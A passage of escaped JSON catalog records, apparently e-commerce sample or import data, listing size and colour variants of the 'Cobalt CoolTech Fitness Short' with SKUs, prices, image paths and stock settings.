Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cobalt-cooltech-trade-fitness-short-33-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh01-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh01-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Blue\"},\"839\":{\"sku\":\"MSH01-33-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Cobalt CoolTech&trade; Fitness Short-33-Red\",\"description\":\"<p>It\'s not rocket surgery: the hotter your conditions, the more you need to stay cool. That\'s why the Cobalt CoolTech&trade; Fitness Short features built-in technology and side perforations that keep you ventilated and comfortable for the distance. The elastic waist promises a personalized fit.<\\/p>\\n<p>&bull; Light blue nylon shorts.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 5\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cobalt-cooltech-trade-fitness-short-33-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Red\"},\"840\":{\"sku\":\"MSH01-34-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Cobalt CoolTech&trade; Fitness Short-34-Black\",\"description\":\"<p>It\'s not rocket surgery: the hotter your conditions, the more you need to stay cool. That\'s why the Cobalt CoolTech&trade; Fitness Short features built-in technology and side perforations that keep you ventilated and comfortable for the distance. The elastic waist promises a personalized fit.<\\/p>\\n<p>&bull; Light blue nylon shorts.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 5\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cobalt-cooltech-trade-fitness-short-34-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Black\"},\"841\":{\"sku\":\"MSH01-34-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Cobalt CoolTech&trade; Fitness Short-34-Blue\",\"description\":\"<p>It\'s not rocket surgery: the hotter your conditions, the more you need to stay cool. That\'s why the Cobalt CoolTech&trade; Fitness Short features built-in technology and side perforations that keep you ventilated and comfortable for the distance. The elastic waist promises a personalized fit.<\\/p>\\n<p>&bull; Light blue nylon shorts.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 5\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cobalt-cooltech-trade-fitness-short-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh01-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh01-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"842\":{\"sku\":\"MSH01-34-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Cobalt CoolTech&trade; Fitness Short-34-Red\",\"description\":\"<p>It\'s not rocket surgery: the hotter your conditions, the more you need to stay cool. That\'s why the Cobalt CoolTech&trade; Fitness Short features built-in technology and side perforations that keep you ventilated and comfortable for the distance. The elastic waist promises a personalized fit.<\\/p>\\n<p>&bull; Light blue nylon shorts.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 5\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cobalt-cooltech-trade-fitness-short-34-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Red\"},\"843\":{\"sku\":\"MSH01-36-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Cobalt CoolTech&trade; Fitness Short-36-Black\",\"description\":\"<p>It\'s not rocket surgery: the hotter your conditions, the more you need to stay cool. That\'s why the Cobalt CoolTech&trade; Fitness Short features built-in technology and side perforations that keep you ventilated and comfortable for the distance. The elastic waist promises a personalized fit.<\\/p>\\n<p>&bull; Light blue nylon shorts.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 5\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cobalt-cooltech-trade-fitness-short-36-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Black\"},\"844\":{\"sku\":\"MSH01-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Cobalt CoolTech&trade; Fitness Short-36-Blue\",\"description\":\"<p>It\'s not rocket surgery: the hotter your conditions, the more you need to stay cool. That\'s why the Cobalt CoolTech&trade; Fitness Short features built-in technology and side perforations that keep you ventilated and comfortable for the distance. The elastic waist promises a personalized fit.<\\/p>\\n<p>&bull; Light blue nylon shorts.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 5\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cobalt-cooltech-trade-fitness-short-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh01-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh01-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"845\":{\"sku\":\"MSH01-36-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Cobalt CoolTech&trade; Fitness Short-36-Red\",\"description\":\"<p>It\'s not rocket surgery: the hotter your conditions, the more you need to stay cool. That\'s why the Cobalt CoolTech&trade; Fitness Short features built-in technology and side perforations that keep you ventilated and comfortable for the distance. The elastic waist promises a personalized fit.<\\/p>\\n<p>&bull; Light blue nylon shorts.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 5\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cobalt-cooltech-trade-fitness-short-36-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Red\"},\"846\":{\"sku\":\"MSH01\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Cobalt CoolTech&trade; Fitness Short\",\"description\":\"<p>It\'s not rocket surgery: the hotter your conditions, the more you need to stay cool. That\'s why the Cobalt CoolTech&trade; Fitness Short features built-in technology and side perforations that keep you ventilated and comfortable for the distance. The elastic waist promises a personalized fit.<\\/p>\\n<p>&bull; Light blue nylon shorts.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 5\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"44\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh01-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Base Layer,material=CoolTech&trade;|Nylon|Polyester|Wool,pattern=Solid,climate=All-weather|Indoor|Hot,eco_collection=No,performance_fabric=No,erin_recommends=Yes,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MSH01-32-Black,size=32,color=Black|sku=MSH01-32-Blue,size=32,color=Blue|sku=MSH01-32-Red,size=32,color=Red|sku=MSH01-33-Black,size=33,color=Black|sku=MSH01-33-Blue,size=33,color=Blue|sku=MSH01-33-Red,size=33,color=Red|sku=MSH01-34-Black,size=34,color=Black|sku=MSH01-34-Blue,size=34,color=Blue|sku=MSH01-34-Red,size=34,color=Red|sku=MSH01-36-Black,size=36,color=Black|sku=MSH01-36-Blue,size=36,color=Blue|sku=MSH01-36-Red,size=36,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh01-blue_back.jpg\",\"image\":\